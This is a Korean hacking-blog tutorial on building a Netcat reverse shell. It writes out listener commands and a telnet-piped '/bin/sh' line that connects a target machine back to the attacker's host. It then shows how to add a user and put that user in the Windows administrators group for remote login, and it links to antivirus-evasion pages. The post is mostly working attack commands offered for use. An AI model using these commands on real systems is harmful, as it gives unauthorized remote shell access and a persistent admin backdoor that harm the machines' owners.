Netcat Reverse Shell


우선 두대의 PC가 필요하며 각 PC에는 Netcat이 필요하다

HOST PC에서 nc 를 cmd를 통해서 2개를 연 후

> nc -l -p 1111

> nc -l -p 2222

위와 같이 두개의 port를 오픈한다.


Target PC에선 nc 를 연 후 

# telnet HOST_IP 1111 | /bin/sh | telnet HOST_IP 2222 

이렇게 해주면 Host에서 port  1111로 오픈한 cmd 창을 통하여 명령어를 전달하면 port 2222를 통하여 결과값을 돌려 받을 수가 있다.


연결 후  'net user'라는 명령어를 사용하면 위 스크린샷 처럼 현재 시스템에 등록되어 있는 사용자를 보여준다. net user /add USER PASSWORD' 명령은 사용자를 시스템에 등록해준다. 예제로 1111의 비밀번호를 사용하는 test라는 사용자를 등록하였다.

그리고 'net localgroup administrators test /add'를 사용해서 test 사용자를 관리자 그룹으로 옮겨준다. 윈도우는 기본정책으로 관리자가 아니면 원격제어를 제한한다. 따라서 사용자를 관리자 그룹으로 만들어 주는 것이다. 관리자 그룹으로 이동시킨 사용자는 위 스크린샷 처럼 원격 로그인이 된다. 고유의 사용자를 만든 것이므로 사용자를 위한 여러 개인설정을 만든다.






백신우회

http://cdpython.tistory.com/22

http://0x191unauthorized.blogspot.kr/2011/08/antivirus-hiding.html


참고 사이트 및 출처

http://devanix.tistory.com/307

http://blog.daum.net/sysnet924/246

[출처] 리버스쏄|작성자 별향

[출처] 리버스쏄|작성자 별향

[출처] 리버스쏄|작성자 별향

[출처] 리버스쏄|작성자 별향

'Hacking > Network Hacking' 카테고리의 다른 글

WiFi Crack - WPA  (0) 2015.08.24
WiFi Crack - WEP  (0) 2015.08.24
네트워크 해킹 순서 참고 사이트  (0) 2015.08.20
Cain&Abel - ARP_Spoofing Attack  (0) 2015.03.23